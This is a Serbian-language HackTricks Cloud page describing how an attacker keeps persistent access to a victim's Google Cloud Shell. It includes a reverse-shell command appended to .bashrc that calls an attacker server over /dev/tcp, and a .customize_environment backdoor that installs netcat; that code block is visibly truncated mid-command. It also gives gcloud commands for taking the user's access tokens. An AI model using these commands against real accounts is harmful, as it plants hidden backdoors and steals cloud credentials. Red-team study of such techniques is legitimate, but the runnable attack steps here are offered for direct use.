GCP - Cloud Shell Persistence
Tip
Učite i vežbajte AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Učite i vežbajte Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
Cloud Shell
Za više informacija pogledajte:
Trajni backdoor
Google Cloud Shell vam omogućava pristup komandnoj liniji vaših cloud resursa direktno iz pregledača bez ikakvog troška.
Pristup Google Cloud Shell možete ostvariti iz web konzole ili pokretanjem gcloud cloud-shell ssh.
Ova konzola ima nekoliko zanimljivih mogućnosti za napadače:
- Bilo koji Google korisnik sa pristupom Google Cloud ima pristup potpuno autentifikovanoj Cloud Shell instanci (Service Accounts takođe mogu, čak i ako su Owners organizacije).
- Ta instanca će zadržati svoj home directory najmanje 120 dana ako nema aktivnosti.
- Organizacija nema mogućnosti da nadzire aktivnost te instance.
Ovo praktično znači da napadač može postaviti backdoor u home directory korisnika i, sve dok se korisnik povezuje na GC Shell najmanje svakih 120 dana, backdoor će opstati i napadač će dobiti shell svaki put kada se pokrene jednostavnim:
Add reverse shell to .bashrc
```bash echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/'$CCSERVER'/443 0>&1 &)' >> $HOME/.bashrc ```U home folderu se nalazi još jedna datoteka pod nazivom .customize_environment koja, ako postoji, biće izvršena svaki put kada korisnik pristupi cloud shell (kao u prethodnoj tehnici). Jednostavno ubacite prethodni backdoor ili neki poput sledećeg da održite persistence sve dok korisnik “frequently” koristi cloud shell:
Kreiraj .customize_environment backdoor
```bash #!/bin/sh apt-get install netcat -y ncWarning
Važno je napomenuti da se prvi put kada se izvrši radnja koja zahteva autentifikaciju pojavljuje prozor za autorizaciju (pop-up) u korisnikovom pregledaču. Ovaj prozor mora biti prihvaćen pre nego što komanda može da se izvrši. Ako se pojavi neočekivani pop-up, to može izazvati sumnju i potencijalno kompromitovati persistence method koja se koristi.
This is the pop-up from executing gcloud projects list from the Cloud Shell (as attacker) viewed in the browser’s user session:
.png)
However, if the user has actively used the Cloud Shell, the pop-up won’t appear and you can prikupiti tokens korisnika pomoću:
Dobijanje access tokens iz Cloud Shell
```bash gcloud auth print-access-token gcloud auth application-default print-access-token ```Kako se uspostavlja SSH konekcija
U suštini, koriste se ova 3 API poziva:
- https://content-cloudshell.googleapis.com/v1/users/me/environments/default:addPublicKey [POST] (će vam omogućiti da dodate vaš public key koji ste kreirali lokalno)
- https://content-cloudshell.googleapis.com/v1/users/me/environments/default:start [POST] (će vam omogućiti da pokrenete instancu)
- https://content-cloudshell.googleapis.com/v1/users/me/environments/default [GET] (reći će vam IP adresu google cloud shell-a)
Više informacija možete pronaći na https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key
Reference
- https://89berner.medium.com/persistant-gcp-backdoors-with-googles-cloud-shell-2f75c83096ec
- https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key
- https://securityintelligence.com/posts/attacker-achieve-persistence-google-cloud-platform-cloud-shell/
Tip
Učite i vežbajte AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Učite i vežbajte Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
HackTricks Cloud

